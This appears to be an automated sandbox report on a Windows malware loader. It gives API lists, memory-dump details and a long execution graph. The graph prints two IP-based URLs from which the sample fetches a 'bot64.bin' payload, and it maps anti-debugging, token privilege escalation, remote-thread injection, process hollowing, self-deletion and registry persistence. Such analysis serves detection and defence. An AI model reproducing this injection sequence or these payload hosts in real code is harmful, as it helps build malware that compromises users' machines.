                                                                                                                                                                                                                                                    Function 00007FF6626D2ED0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 28memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: InternetOpenW.WININET ref: 00007FF6626D1C64
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: Sleep.KERNEL32 ref: 00007FF6626D1C7C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: InternetOpenUrlW.WININET ref: 00007FF6626D1CA8
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: InternetOpenUrlW.WININET ref: 00007FF6626D1CDF
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: InternetCloseHandle.WININET ref: 00007FF6626D1CF7
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: Sleep.KERNEL32 ref: 00007FF6626D1D02
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: HttpQueryInfoA.WININET ref: 00007FF6626D1D32
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: InternetCloseHandle.WININET ref: 00007FF6626D1D41
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: InternetCloseHandle.WININET ref: 00007FF6626D1D4C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: Sleep.KERNEL32 ref: 00007FF6626D1D57
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: InternetCloseHandle.WININET ref: 00007FF6626D1D71
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: InternetOpenUrlW.WININET ref: 00007FF6626D1D9B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: InternetCloseHandle.WININET ref: 00007FF6626D1DB3
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: Sleep.KERNEL32 ref: 00007FF6626D1DBE
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: HttpQueryInfoA.WININET ref: 00007FF6626D1DF6
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: GetProcessHeap.KERNEL32 ref: 00007FF6626D1E05
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: HeapAlloc.KERNEL32 ref: 00007FF6626D1E1B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D1C20: InternetCloseHandle.WININET ref: 00007FF6626D1E33
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3FE8: GetCurrentProcess.KERNEL32 ref: 00007FF6626D404F
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3FE8: OpenProcessToken.ADVAPI32 ref: 00007FF6626D4062
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3FE8: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6626D408A
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3FE8: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6626D40B5
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3FE8: CloseHandle.KERNEL32 ref: 00007FF6626D40C0
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3FE8: OpenProcess.KERNEL32 ref: 00007FF6626D40D5
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3FE8: CloseHandle.KERNEL32 ref: 00007FF6626D414D
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32 ref: 00007FF6626D2F3C
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32 ref: 00007FF6626D2F4C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$Open$Process$HeapSleep$HttpInfoQueryToken$AdjustAllocCurrentFreeLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                                                    • String ID: http://176.111.174.140/bin/bot64.bin$http://176.111.174.177/bin/bot64.bin
                                                                                                                                                                                                                                                    • API String ID: 482118104-517461732
                                                                                                                                                                                                                                                    • Opcode ID: 9e57ee357461c1e72bec33a302a96111ffb077baf70864d85e7053ed898b4a17
                                                                                                                                                                                                                                                    • Instruction ID: 73b1ab4fed48d12219c5537897cd678838364d8096f3c63406f48e9638ddab43
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e57ee357461c1e72bec33a302a96111ffb077baf70864d85e7053ed898b4a17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08012C24A08A4BC3EF10EB15F8943A573B0AB8875CFB04935E84CCF265DEBCE545AB41

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:22.3%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:472
                                                                                                                                                                                                                                                    Total number of Limit Nodes:4
                                                                                                                                                                                                                                                    execution_graph 764 7ff7f2d03360 824 7ff7f2d010a0 764->824 769 7ff7f2d03380 1044 7ff7f2d04168 GetCurrentProcess OpenProcessToken 769->1044 770 7ff7f2d03378 ExitProcess 774 7ff7f2d0339b 775 7ff7f2d033b0 774->775 776 7ff7f2d033ff 774->776 777 7ff7f2d042a8 3 API calls 775->777 779 7ff7f2d03414 776->779 780 7ff7f2d03450 776->780 778 7ff7f2d033bc 777->778 781 7ff7f2d033d6 ExitProcess 778->781 782 7ff7f2d033c3 778->782 1059 7ff7f2d042a8 CreateMutexExA 779->1059 790 7ff7f2d034a6 780->790 791 7ff7f2d03465 780->791 784 7ff7f2d042a8 3 API calls 782->784 786 7ff7f2d033cf 784->786 786->781 789 7ff7f2d033de 786->789 787 7ff7f2d0342f 1072 7ff7f2d03180 787->1072 788 7ff7f2d03427 ExitProcess 1063 7ff7f2d03210 789->1063 1077 7ff7f2d03978 790->1077 795 7ff7f2d042a8 3 API calls 791->795 799 7ff7f2d03471 795->799 796 7ff7f2d03434 800 7ff7f2d0343b Sleep 796->800 801 7ff7f2d03448 ExitProcess 796->801 798 7ff7f2d033e3 803 7ff7f2d033ea Sleep 798->803 804 7ff7f2d033f7 ExitProcess 798->804 805 7ff7f2d03480 799->805 806 7ff7f2d03478 ExitProcess 799->806 800->796 803->798 807 7ff7f2d03180 21 API calls 805->807 809 7ff7f2d03485 807->809 812 7ff7f2d0348c Sleep 809->812 813 7ff7f2d03499 ExitProcess 809->813 810 7ff7f2d03512 7 API calls 811 7ff7f2d034be 814 7ff7f2d042a8 3 API calls 811->814 812->809 816 7ff7f2d034ca 814->816 815 7ff7f2d034e4 ExitProcess 816->815 817 7ff7f2d042a8 3 API calls 816->817 818 7ff7f2d034dd 817->818 818->815 819 7ff7f2d034ec 818->819 820 7ff7f2d03210 51 API calls 819->820 821 7ff7f2d034f1 820->821 822 7ff7f2d03505 ExitProcess 821->822 823 7ff7f2d034f8 Sleep 821->823 823->821 1088 7ff7f2d01000 LoadLibraryA GetProcAddress 824->1088 826 7ff7f2d01131 1089 7ff7f2d01000 LoadLibraryA GetProcAddress 826->1089 828 7ff7f2d0114b 1090 7ff7f2d01050 LoadLibraryA GetProcAddress 828->1090 830 7ff7f2d01165 1091 7ff7f2d01050 LoadLibraryA GetProcAddress 830->1091 832 7ff7f2d0117f 1092 7ff7f2d01050 LoadLibraryA GetProcAddress 832->1092 834 7ff7f2d01199 1093 7ff7f2d01050 LoadLibraryA GetProcAddress 834->1093 836 7ff7f2d011b3 1094 7ff7f2d01050 LoadLibraryA GetProcAddress 836->1094 838 7ff7f2d011cd 1095 7ff7f2d01050 LoadLibraryA GetProcAddress 838->1095 840 7ff7f2d011e7 1096 7ff7f2d01050 LoadLibraryA GetProcAddress 840->1096 842 7ff7f2d01201 1097 7ff7f2d01050 LoadLibraryA GetProcAddress 842->1097 844 7ff7f2d0121b 1098 7ff7f2d01050 LoadLibraryA GetProcAddress 844->1098 846 7ff7f2d01235 1099 7ff7f2d01050 LoadLibraryA GetProcAddress 846->1099 848 7ff7f2d0124f 1100 7ff7f2d01050 LoadLibraryA GetProcAddress 848->1100 850 7ff7f2d01269 1101 7ff7f2d01050 LoadLibraryA GetProcAddress 850->1101 852 7ff7f2d01283 1102 7ff7f2d01050 LoadLibraryA GetProcAddress 852->1102 854 7ff7f2d0129d 1103 7ff7f2d01050 LoadLibraryA GetProcAddress 854->1103 856 7ff7f2d012b7 1104 7ff7f2d01050 LoadLibraryA GetProcAddress 856->1104 858 7ff7f2d012d1 1105 7ff7f2d01050 LoadLibraryA GetProcAddress 858->1105 860 7ff7f2d012eb 1106 7ff7f2d01050 LoadLibraryA GetProcAddress 860->1106 862 7ff7f2d01305 1107 7ff7f2d01050 LoadLibraryA GetProcAddress 862->1107 864 7ff7f2d0131f 1108 7ff7f2d01050 LoadLibraryA GetProcAddress 864->1108 866 7ff7f2d01339 1109 7ff7f2d01050 LoadLibraryA GetProcAddress 866->1109 868 7ff7f2d01353 1110 7ff7f2d01050 LoadLibraryA GetProcAddress 868->1110 870 7ff7f2d0136d 1111 7ff7f2d01050 LoadLibraryA GetProcAddress 870->1111 872 7ff7f2d01387 1112 7ff7f2d01050 LoadLibraryA GetProcAddress 872->1112 874 7ff7f2d013a1 1113 7ff7f2d01050 LoadLibraryA GetProcAddress 874->1113 876 7ff7f2d013bb 1114 7ff7f2d01050 LoadLibraryA GetProcAddress 876->1114 878 7ff7f2d013d5 1115 7ff7f2d01050 LoadLibraryA GetProcAddress 878->1115 880 7ff7f2d013ef 1116 7ff7f2d01050 LoadLibraryA GetProcAddress 880->1116 882 7ff7f2d01409 1117 7ff7f2d01050 LoadLibraryA GetProcAddress 882->1117 884 7ff7f2d01423 1118 7ff7f2d01050 LoadLibraryA GetProcAddress 884->1118 886 7ff7f2d0143d 1119 7ff7f2d01050 LoadLibraryA GetProcAddress 886->1119 888 7ff7f2d01457 1120 7ff7f2d01050 LoadLibraryA GetProcAddress 888->1120 890 7ff7f2d01471 1121 7ff7f2d01050 LoadLibraryA GetProcAddress 890->1121 892 7ff7f2d0148b 1122 7ff7f2d01050 LoadLibraryA GetProcAddress 892->1122 894 7ff7f2d014a5 1123 7ff7f2d01050 LoadLibraryA GetProcAddress 894->1123 896 7ff7f2d014bf 1124 7ff7f2d01050 LoadLibraryA GetProcAddress 896->1124 898 7ff7f2d014d9 1125 7ff7f2d01050 LoadLibraryA GetProcAddress 898->1125 900 7ff7f2d014f3 1126 7ff7f2d01050 LoadLibraryA GetProcAddress 900->1126 902 7ff7f2d0150d 1127 7ff7f2d01050 LoadLibraryA GetProcAddress 902->1127 904 7ff7f2d01527 1128 7ff7f2d01050 LoadLibraryA GetProcAddress 904->1128 906 7ff7f2d01541 1129 7ff7f2d01050 LoadLibraryA GetProcAddress 906->1129 908 7ff7f2d0155b 1130 7ff7f2d01050 LoadLibraryA GetProcAddress 908->1130 910 7ff7f2d01575 1131 7ff7f2d01050 LoadLibraryA GetProcAddress 910->1131 912 7ff7f2d0158f 1132 7ff7f2d01050 LoadLibraryA GetProcAddress 912->1132 914 7ff7f2d015a9 1133 7ff7f2d01050 LoadLibraryA GetProcAddress 914->1133 916 7ff7f2d015c3 1134 7ff7f2d01050 LoadLibraryA GetProcAddress 916->1134 918 7ff7f2d015dd 1135 7ff7f2d01050 LoadLibraryA GetProcAddress 918->1135 920 7ff7f2d015f7 1136 7ff7f2d01050 LoadLibraryA GetProcAddress 920->1136 922 7ff7f2d01611 1137 7ff7f2d01050 LoadLibraryA GetProcAddress 922->1137 924 7ff7f2d0162b 1138 7ff7f2d01050 LoadLibraryA GetProcAddress 924->1138 926 7ff7f2d01645 1139 7ff7f2d01050 LoadLibraryA GetProcAddress 926->1139 928 7ff7f2d0165f 1140 7ff7f2d01050 LoadLibraryA GetProcAddress 928->1140 930 7ff7f2d01679 1141 7ff7f2d01050 LoadLibraryA GetProcAddress 930->1141 932 7ff7f2d01693 1142 7ff7f2d01050 LoadLibraryA GetProcAddress 932->1142 934 7ff7f2d016ad 1143 7ff7f2d01050 LoadLibraryA GetProcAddress 934->1143 936 7ff7f2d016c7 1144 7ff7f2d01050 LoadLibraryA GetProcAddress 936->1144 938 7ff7f2d016e1 1145 7ff7f2d01050 LoadLibraryA GetProcAddress 938->1145 940 7ff7f2d016fb 1146 7ff7f2d01050 LoadLibraryA GetProcAddress 940->1146 942 7ff7f2d01715 1147 7ff7f2d01050 LoadLibraryA GetProcAddress 942->1147 944 7ff7f2d0172f 1148 7ff7f2d01050 LoadLibraryA GetProcAddress 944->1148 946 7ff7f2d01749 1149 7ff7f2d01050 LoadLibraryA GetProcAddress 946->1149 948 7ff7f2d01763 1150 7ff7f2d01050 LoadLibraryA GetProcAddress 948->1150 950 7ff7f2d0177d 1151 7ff7f2d01050 LoadLibraryA GetProcAddress 950->1151 952 7ff7f2d01797 1152 7ff7f2d01050 LoadLibraryA GetProcAddress 952->1152 954 7ff7f2d017b1 1153 7ff7f2d01050 LoadLibraryA GetProcAddress 954->1153 956 7ff7f2d017cb 1154 7ff7f2d01050 LoadLibraryA GetProcAddress 956->1154 958 7ff7f2d017e5 1155 7ff7f2d01050 LoadLibraryA GetProcAddress 958->1155 960 7ff7f2d017ff 1156 7ff7f2d01050 LoadLibraryA GetProcAddress 960->1156 962 7ff7f2d01819 1157 7ff7f2d01050 LoadLibraryA GetProcAddress 962->1157 964 7ff7f2d01833 1158 7ff7f2d01050 LoadLibraryA GetProcAddress 964->1158 966 7ff7f2d0184d 1159 7ff7f2d01050 LoadLibraryA GetProcAddress 966->1159 968 7ff7f2d01867 1160 7ff7f2d01050 LoadLibraryA GetProcAddress 968->1160 970 7ff7f2d01881 1161 7ff7f2d01050 LoadLibraryA GetProcAddress 970->1161 972 7ff7f2d0189b 1162 7ff7f2d01050 LoadLibraryA GetProcAddress 972->1162 974 7ff7f2d018b5 1163 7ff7f2d01050 LoadLibraryA GetProcAddress 974->1163 976 7ff7f2d018cf 1164 7ff7f2d01050 LoadLibraryA GetProcAddress 976->1164 978 7ff7f2d018e9 1165 7ff7f2d01050 LoadLibraryA GetProcAddress 978->1165 980 7ff7f2d01903 1166 7ff7f2d01050 LoadLibraryA GetProcAddress 980->1166 982 7ff7f2d0191d 1167 7ff7f2d01050 LoadLibraryA GetProcAddress 982->1167 984 7ff7f2d01937 1168 7ff7f2d01050 LoadLibraryA GetProcAddress 984->1168 986 7ff7f2d01951 1169 7ff7f2d01050 LoadLibraryA GetProcAddress 986->1169 988 7ff7f2d0196b 1170 7ff7f2d01050 LoadLibraryA GetProcAddress 988->1170 990 7ff7f2d01985 1171 7ff7f2d01050 LoadLibraryA GetProcAddress 990->1171 992 7ff7f2d0199f 1172 7ff7f2d01050 LoadLibraryA GetProcAddress 992->1172 994 7ff7f2d019b9 1173 7ff7f2d01050 LoadLibraryA GetProcAddress 994->1173 996 7ff7f2d019d3 1174 7ff7f2d01050 LoadLibraryA GetProcAddress 996->1174 998 7ff7f2d019ed 1175 7ff7f2d01050 LoadLibraryA GetProcAddress 998->1175 1000 7ff7f2d01a07 1176 7ff7f2d01050 LoadLibraryA GetProcAddress 1000->1176 1002 7ff7f2d01a21 1177 7ff7f2d01050 LoadLibraryA GetProcAddress 1002->1177 1004 7ff7f2d01a3b 1178 7ff7f2d01050 LoadLibraryA GetProcAddress 1004->1178 1006 7ff7f2d01a55 1179 7ff7f2d01050 LoadLibraryA GetProcAddress 1006->1179 1008 7ff7f2d01a6f 1180 7ff7f2d01050 LoadLibraryA GetProcAddress 1008->1180 1010 7ff7f2d01a89 1181 7ff7f2d01050 LoadLibraryA GetProcAddress 1010->1181 1012 7ff7f2d01aa3 1182 7ff7f2d01000 LoadLibraryA GetProcAddress 1012->1182 1014 7ff7f2d01abd 1183 7ff7f2d01050 LoadLibraryA GetProcAddress 1014->1183 1016 7ff7f2d01ad7 1184 7ff7f2d01050 LoadLibraryA GetProcAddress 1016->1184 1018 7ff7f2d01af1 1185 7ff7f2d01050 LoadLibraryA GetProcAddress 1018->1185 1020 7ff7f2d01b0b 1186 7ff7f2d01050 LoadLibraryA GetProcAddress 1020->1186 1022 7ff7f2d01b25 1187 7ff7f2d01050 LoadLibraryA GetProcAddress 1022->1187 1024 7ff7f2d01b3f 1188 7ff7f2d01050 LoadLibraryA GetProcAddress 1024->1188 1026 7ff7f2d01b59 1189 7ff7f2d01050 LoadLibraryA GetProcAddress 1026->1189 1028 7ff7f2d01b73 1190 7ff7f2d01050 LoadLibraryA GetProcAddress 1028->1190 1030 7ff7f2d01b8d 1191 7ff7f2d01050 LoadLibraryA GetProcAddress 1030->1191 1032 7ff7f2d01ba7 1192 7ff7f2d01050 LoadLibraryA GetProcAddress 1032->1192 1034 7ff7f2d01bc1 1193 7ff7f2d01050 LoadLibraryA GetProcAddress 1034->1193 1036 7ff7f2d01bdb 1194 7ff7f2d01050 LoadLibraryA GetProcAddress 1036->1194 1038 7ff7f2d01bf5 1195 7ff7f2d01050 LoadLibraryA GetProcAddress 1038->1195 1040 7ff7f2d01c0f 1041 7ff7f2d03120 IsDebuggerPresent 1040->1041 1042 7ff7f2d03132 GetCurrentProcess CheckRemoteDebuggerPresent 1041->1042 1043 7ff7f2d0312e 1041->1043 1042->1043 1043->769 1043->770 1045 7ff7f2d0418e GetTokenInformation 1044->1045 1046 7ff7f2d03385 1044->1046 1196 7ff7f2d03a58 VirtualAlloc 1045->1196 1055 7ff7f2d03be8 GetModuleFileNameW 1046->1055 1048 7ff7f2d041bf GetTokenInformation 1049 7ff7f2d04206 AdjustTokenPrivileges CloseHandle 1048->1049 1050 7ff7f2d041ec CloseHandle 1048->1050 1197 7ff7f2d03a28 1049->1197 1051 7ff7f2d03a28 VirtualFree 1050->1051 1052 7ff7f2d04201 1051->1052 1052->1046 1056 7ff7f2d03cd6 wcsncpy 1055->1056 1057 7ff7f2d03c13 PathFindFileNameW wcslen 1055->1057 1058 7ff7f2d03c4d 1056->1058 1057->1058 1058->774 1060 7ff7f2d042d4 GetLastError 1059->1060 1061 7ff7f2d03420 1059->1061 1060->1061 1062 7ff7f2d042e1 CloseHandle 1060->1062 1061->787 1061->788 1062->1061 1200 7ff7f2d037c8 1063->1200 1065 7ff7f2d03221 1203 7ff7f2d01c20 1065->1203 1067 7ff7f2d0323b 1068 7ff7f2d0327d 1067->1068 1220 7ff7f2d03fc8 1067->1220 1068->798 1073 7ff7f2d037c8 11 API calls 1072->1073 1074 7ff7f2d03190 1073->1074 1259 7ff7f2d043b8 CreateFileW 1074->1259 1078 7ff7f2d03648 3 API calls 1077->1078 1079 7ff7f2d039a3 1078->1079 1080 7ff7f2d037c8 11 API calls 1079->1080 1081 7ff7f2d039ad GetModuleFileNameW DeleteFileW 1080->1081 1082 7ff7f2d039e7 1081->1082 1083 7ff7f2d039ef SetFileAttributesW 1082->1083 1084 7ff7f2d034ab 1082->1084 1271 7ff7f2d038b8 RegOpenKeyExW 1083->1271 1086 7ff7f2d032f0 GetVersionExW 1084->1086 1087 7ff7f2d03321 1086->1087 1087->810 1087->811 1088->826 1089->828 1090->830 1091->832 1092->834 1093->836 1094->838 1095->840 1096->842 1097->844 1098->846 1099->848 1100->850 1101->852 1102->854 1103->856 1104->858 1105->860 1106->862 1107->864 1108->866 1109->868 1110->870 1111->872 1112->874 1113->876 1114->878 1115->880 1116->882 1117->884 1118->886 1119->888 1120->890 1121->892 1122->894 1123->896 1124->898 1125->900 1126->902 1127->904 1128->906 1129->908 1130->910 1131->912 1132->914 1133->916 1134->918 1135->920 1136->922 1137->924 1138->926 1139->928 1140->930 1141->932 1142->934 1143->936 1144->938 1145->940 1146->942 1147->944 1148->946 1149->948 1150->950 1151->952 1152->954 1153->956 1154->958 1155->960 1156->962 1157->964 1158->966 1159->968 1160->970 1161->972 1162->974 1163->976 1164->978 1165->980 1166->982 1167->984 1168->986 1169->988 1170->990 1171->992 1172->994 1173->996 1174->998 1175->1000 1176->1002 1177->1004 1178->1006 1179->1008 1180->1010 1181->1012 1182->1014 1183->1016 1184->1018 1185->1020 1186->1022 1187->1024 1188->1026 1189->1028 1190->1030 1191->1032 1192->1034 1193->1036 1194->1038 1195->1040 1196->1048 1198 7ff7f2d03a4c 1197->1198 1199 7ff7f2d03a39 VirtualFree 1197->1199 1198->1046 1199->1198 1235 7ff7f2d03648 GetWindowsDirectoryW 1200->1235 1202 7ff7f2d037f7 8 API calls 1202->1065 1204 7ff7f2d01c4a InternetOpenW 1203->1204 1205 7ff7f2d01c84 InternetOpenUrlW 1204->1205 1206 7ff7f2d01c77 Sleep 1204->1206 1207 7ff7f2d01d0d HttpQueryInfoA 1205->1207 1208 7ff7f2d01cbb InternetOpenUrlW 1205->1208 1206->1204 1210 7ff7f2d01d62 1207->1210 1211 7ff7f2d01d3c InternetCloseHandle InternetCloseHandle Sleep 1207->1211 1208->1207 1209 7ff7f2d01cf2 InternetCloseHandle Sleep 1208->1209 1209->1204 1212 7ff7f2d01d6c InternetCloseHandle InternetOpenUrlW 1210->1212 1213 7ff7f2d01dc9 HttpQueryInfoA GetProcessHeap HeapAlloc 1210->1213 1211->1204 1212->1213 1214 7ff7f2d01dae InternetCloseHandle Sleep 1212->1214 1215 7ff7f2d01e2e InternetCloseHandle InternetCloseHandle 1213->1215 1218 7ff7f2d01e48 1213->1218 1214->1204 1216 7ff7f2d01ec7 1215->1216 1216->1067 1217 7ff7f2d01e50 InternetReadFile 1217->1218 1219 7ff7f2d01e9e InternetCloseHandle InternetCloseHandle 1217->1219 1218->1217 1218->1219 1219->1216 1240 7ff7f2d03f08 CreateToolhelp32Snapshot 1220->1240 1223 7ff7f2d03fe8 1224 7ff7f2d0404f GetCurrentProcess OpenProcessToken 1223->1224 1225 7ff7f2d040c6 OpenProcess 1224->1225 1226 7ff7f2d0406c LookupPrivilegeValueW 1224->1226 1232 7ff7f2d040f2 1225->1232 1234 7ff7f2d040e8 1225->1234 1227 7ff7f2d04094 AdjustTokenPrivileges 1226->1227 1228 7ff7f2d040bb CloseHandle 1226->1228 1227->1228 1228->1225 1230 7ff7f2d04153 1230->1068 1231 7ff7f2d04148 CloseHandle 1231->1230 1233 7ff7f2d04126 WaitForSingleObject 1232->1233 1232->1234 1247 7ff7f2d02bfc 1232->1247 1233->1224 1233->1234 1234->1230 1234->1231 1236 7ff7f2d03692 1235->1236 1237 7ff7f2d0369c GetVolumeInformationW 1235->1237 1236->1237 1238 7ff7f2d03718 1237->1238 1239 7ff7f2d03782 wsprintfW 1238->1239 1239->1202 1241 7ff7f2d03f43 Process32FirstW 1240->1241 1242 7ff7f2d03268 1240->1242 1243 7ff7f2d03f62 wcscmp 1241->1243 1244 7ff7f2d03f9d CloseHandle 1241->1244 1242->1223 1245 7ff7f2d03f86 Process32NextW 1243->1245 1246 7ff7f2d03f79 1243->1246 1244->1242 1245->1243 1245->1244 1246->1244 1250 7ff7f2d02c4f 1247->1250 1248 7ff7f2d02c6f 1248->1232 1250->1248 1251 7ff7f2d02c91 VirtualAllocEx 1250->1251 1255 7ff7f2d029cc 1250->1255 1251->1248 1252 7ff7f2d02ccb WriteProcessMemory 1251->1252 1252->1248 1253 7ff7f2d02d14 VirtualProtectEx 1252->1253 1253->1248 1254 7ff7f2d02d47 CreateRemoteThread 1253->1254 1254->1248 1254->1250 1256 7ff7f2d02a45 1255->1256 1257 7ff7f2d02b4e StrStrA 1256->1257 1258 7ff7f2d02a4c 1256->1258 1257->1256 1257->1258 1258->1250 1260 7ff7f2d0442f GetLastError 1259->1260 1261 7ff7f2d0440e 1259->1261 1263 7ff7f2d031a3 CreateThread Sleep CreateThread 1260->1263 1265 7ff7f2d04308 GetFileSize 1261->1265 1263->796 1270 7ff7f2d03a58 VirtualAlloc 1265->1270 1267 7ff7f2d04334 1268 7ff7f2d0437e CloseHandle 1267->1268 1269 7ff7f2d04348 SetFilePointer ReadFile 1267->1269 1268->1263 1269->1268 1270->1267 1272 7ff7f2d038fd RegSetValueExW 1271->1272 1273 7ff7f2d038f9 1271->1273 1272->1273 1273->1084 1274 7ff7f2d030f0 1275 7ff7f2d030f9 1274->1275 1276 7ff7f2d03112 1275->1276 1279 7ff7f2d02f70 1275->1279 1284 7ff7f2d02e30 CreateMutexA 1279->1284 1282 7ff7f2d02fd0 Sleep 1282->1275 1283 7ff7f2d02f8b Sleep CreateThread WaitForSingleObject 1283->1282 1285 7ff7f2d02e5c ReleaseMutex CloseHandle 1284->1285 1286 7ff7f2d02e79 GetLastError 1284->1286 1287 7ff7f2d02ebb 1285->1287 1288 7ff7f2d02e86 ReleaseMutex CloseHandle 1286->1288 1289 7ff7f2d02ea3 ReleaseMutex CloseHandle 1286->1289 1287->1282 1287->1283 1288->1287 1289->1287 1290 7ff7f2d03290 1293 7ff7f2d01f8c GetModuleFileNameW 1290->1293 1294 7ff7f2d0200d 1293->1294 1304 7ff7f2d02008 1293->1304 1295 7ff7f2d02061 1294->1295 1296 7ff7f2d0204b 1294->1296 1336 7ff7f2d01ecc ExpandEnvironmentStringsW 1295->1336 1298 7ff7f2d02055 1296->1298 1299 7ff7f2d0207f 1296->1299 1298->1304 1338 7ff7f2d01f4c ExpandEnvironmentStringsW 1298->1338 1337 7ff7f2d01f0c ExpandEnvironmentStringsW 1299->1337 1300 7ff7f2d02076 1303 7ff7f2d020d1 CreateProcessW 1300->1303 1300->1304 1303->1304 1305 7ff7f2d0212c CreateFileW 1303->1305 1305->1304 1306 7ff7f2d02173 GetFileSize 1305->1306 1307 7ff7f2d02191 1306->1307 1308 7ff7f2d0219b CloseHandle 1306->1308 1307->1308 1309 7ff7f2d021ab VirtualAlloc 1307->1309 1308->1304 1310 7ff7f2d021e5 ReadFile 1309->1310 1311 7ff7f2d021d5 CloseHandle 1309->1311 1312 7ff7f2d02235 CloseHandle GetThreadContext 1310->1312 1313 7ff7f2d02212 VirtualFree CloseHandle 1310->1313 1311->1304 1314 7ff7f2d02285 VirtualFree 1312->1314 1315 7ff7f2d0229d ReadProcessMemory GetModuleHandleA GetProcAddress 1312->1315 1313->1304 1314->1304 1316 7ff7f2d02320 1315->1316 1317 7ff7f2d02324 VirtualFree 1316->1317 1318 7ff7f2d0233c VirtualAllocEx 1316->1318 1317->1304 1319 7ff7f2d023bf WriteProcessMemory 1318->1319 1320 7ff7f2d023a7 VirtualFree 1318->1320 1321 7ff7f2d023f5 VirtualFree 1319->1321 1323 7ff7f2d0240d 1319->1323 1320->1304 1321->1304 1322 7ff7f2d02443 WriteProcessMemory 1322->1323 1324 7ff7f2d024ce VirtualFree 1322->1324 1323->1322 1327 7ff7f2d024eb 1323->1327 1324->1304 1325 7ff7f2d0255d RtlCompareMemory 1325->1327 1333 7ff7f2d025b0 1325->1333 1326 7ff7f2d027dc WriteProcessMemory SetThreadContext 1328 7ff7f2d02862 VirtualFree 1326->1328 1329 7ff7f2d02877 ResumeThread 1326->1329 1327->1325 1327->1326 1328->1304 1330 7ff7f2d0289e VirtualFree 1329->1330 1331 7ff7f2d02889 VirtualFree 1329->1331 1330->1304 1331->1304 1332 7ff7f2d027d7 1332->1326 1333->1332 1334 7ff7f2d026e0 ReadProcessMemory WriteProcessMemory 1333->1334 1334->1333 1335 7ff7f2d027b5 VirtualFree 1334->1335 1335->1304 1336->1300 1337->1300 1338->1300 1339 7ff7f2d032b0 1340 7ff7f2d01f8c 36 API calls 1339->1340 1341 7ff7f2d032c3 1340->1341 1342 7ff7f2d02db0 1343 7ff7f2d037c8 11 API calls 1342->1343 1344 7ff7f2d02dc0 1343->1344 1349 7ff7f2d04808 CreateFileW 1344->1349 1347 7ff7f2d04808 17 API calls 1348 7ff7f2d02e11 1347->1348 1350 7ff7f2d0486e GetFileSize GetProcessHeap HeapAlloc 1349->1350 1351 7ff7f2d02deb 1349->1351 1352 7ff7f2d048c9 ReadFile 1350->1352 1353 7ff7f2d048b7 CloseHandle 1350->1353 1351->1347 1354 7ff7f2d048f0 GetProcessHeap HeapFree CloseHandle 1352->1354 1355 7ff7f2d04918 1352->1355 1353->1351 1354->1351 1356 7ff7f2d04931 GetProcessHeap HeapFree CloseHandle 1355->1356 1358 7ff7f2d04959 1355->1358 1356->1351 1357 7ff7f2d04b03 GetProcessHeap HeapFree CloseHandle 1357->1351 1358->1357 1359 7ff7f2d04a14 GetProcessHeap HeapAlloc 1358->1359 1360 7ff7f2d04a61 1358->1360 1359->1360 1360->1357 1364 7ff7f2d02ed0 1365 7ff7f2d01c20 22 API calls 1364->1365 1366 7ff7f2d02f04 1365->1366 1367 7ff7f2d03fc8 5 API calls 1366->1367 1368 7ff7f2d02f27 1367->1368 1369 7ff7f2d03fe8 13 API calls 1368->1369 1370 7ff7f2d02f3c GetProcessHeap HeapFree 